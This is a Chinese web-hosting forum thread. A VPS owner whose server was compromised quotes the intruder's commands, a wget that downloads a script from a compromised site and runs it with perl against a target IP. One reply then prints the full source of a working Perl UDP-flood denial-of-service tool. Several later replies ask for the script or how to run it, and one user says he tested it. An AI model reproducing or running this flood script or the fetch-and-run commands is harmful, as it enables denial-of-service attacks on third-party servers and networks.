全球主机交流论坛

标题: VPS被人放了一个DD脚本,是密码被破解了? [打印本页]
作者: 七人行    时间: 2011-9-15 17:56
标题: VPS被人放了一个DD脚本,是密码被破解了?
刚发现我的VPS被停了,客服说有人在我的服务器上放了一个DD脚本。

于是上去看了下:


wget http://phsite.com/billing//xxx   ditor/assetmanager/dd.txt
perl dd.txt 38.111.107.157 80 0 0

这时黑客的操作记录。

我想问一下,被这样入侵唯一的可能性是不是密码被人试出来了?(我的root密码很简单)。

还是说是lnmp的漏洞,我装的wdlinux的lnmp。

[ 本帖最后由 七人行 于 2011-9-15 17:59 编辑 ]
作者: Poison    时间: 2011-9-15 17:57


perl版的ddos  别放出来害人啊

赶紧编辑掉
作者: lazyzhu    时间: 2011-9-15 17:57
没有密码的路过
作者: jumpsky    时间: 2011-9-15 17:57
哇 MARK一下 我之前也装的WDCP
作者: skwinx    时间: 2011-9-15 17:58
SSH 扫描破解了
作者: 葫芦娃    时间: 2011-9-15 17:59
或许是程序漏洞
作者: 七人行    时间: 2011-9-15 17:59
原帖由 Poison 于 2011-9-15 17:57 发表


perl版的ddos  别放出来害人啊

赶紧编辑掉

编辑掉了
作者: qiqi13245    时间: 2011-9-15 18:00
#!/usr/bin/perl

##############
# udp flood.
##############

use Socket;
use strict;

if ($#ARGV != 3) {
  print "flood.pl <ip> <port> <size> <time>\n\n";
  print " port=0: use random ports\n";
  print " size=0: use random size between 64 and 1024\n";
  print " time=0: continuous flood\n";
  exit(1);
}

my ($ip,$port,$size,$time) = @ARGV;

my ($iaddr,$endtime,$psize,$pport);

$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 1000000);

socket(flood, PF_INET, SOCK_DGRAM, 17);


print "Flooding $ip " . ($port ? $port : "random") . " port with " .
  ($size ? "$size-byte" : "random size") . " packets" .
  ($time ? " for $time seconds" : "") . "\n";
print "Break with Ctrl-C\n" unless $time;

for (;time() <= $endtime;) {
  $psize = $size ? $size : int(rand(1024-64)+64) ;
  $pport = $port ? $port : int(rand(65500))+1;

  send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}


txt也能运行?
作者: caboo    时间: 2011-9-15 18:00
提示: 作者被禁止或删除 内容自动屏蔽
作者: loveni    时间: 2011-9-15 18:03
自己放的忘了吧
作者: steptodream    时间: 2011-9-15 18:03
标题: 回复 8# qiqi13245 的帖子
只是个扩展名而已   只要内容是perl脚本 用perl来执行 当然没问题。
作者: qun    时间: 2011-9-15 18:09
骑七边肯定是故意的
作者: 店长推荐    时间: 2011-9-15 18:26
求dd脚本
作者: 一跳而过    时间: 2011-9-15 18:31

求脚本
作者: 四师兄    时间: 2011-9-15 18:53
原帖由 qiqi13245 于 2011-9-15 18:00 发表
#!/usr/bin/perl

##############
# udp flood.
##############

use Socket;
use strict;

if ($#ARGV != 3) {
  print "flood.pl    \n\n";
  print " port=0: use random ports\n";
  print " size=0: use rand ...

这个就是代码?
如何运行呢
作者: Yorick    时间: 2011-9-15 18:55
标题: 回复 8# qiqi13245 的帖子
TXT为什么就不能运行
XXX都可以运行
作者: javaluo    时间: 2011-9-15 19:18
测试了下 基本没用

网页照样无压力打开
作者: javaluo    时间: 2011-9-15 19:19
难道是我不会用吗???
作者: edmin    时间: 2011-9-15 19:21
原帖由 qiqi13245 于 2011-9-15 18:00 发表
#!/usr/bin/perl

##############
# udp flood.
##############

use Socket;
use strict;

if ($#ARGV != 3) {
  print "flood.pl    \n\n";
  print " port=0: use random ports\n";
  print " size=0: use rand ...
作者: 誓誓    时间: 2011-9-15 19:25
分享下吧
作者: onesz    时间: 2011-9-15 20:19
我密码是32位
作者: 9426    时间: 2011-9-16 10:20
這log到哪個目錄查?

可以查登入紀錄
作者: zyzit    时间: 2011-9-16 10:26
全是高手呀



欢迎光临 全球主机交流论坛 (https://lilynana.eu.org/) Powered by Discuz! X3.4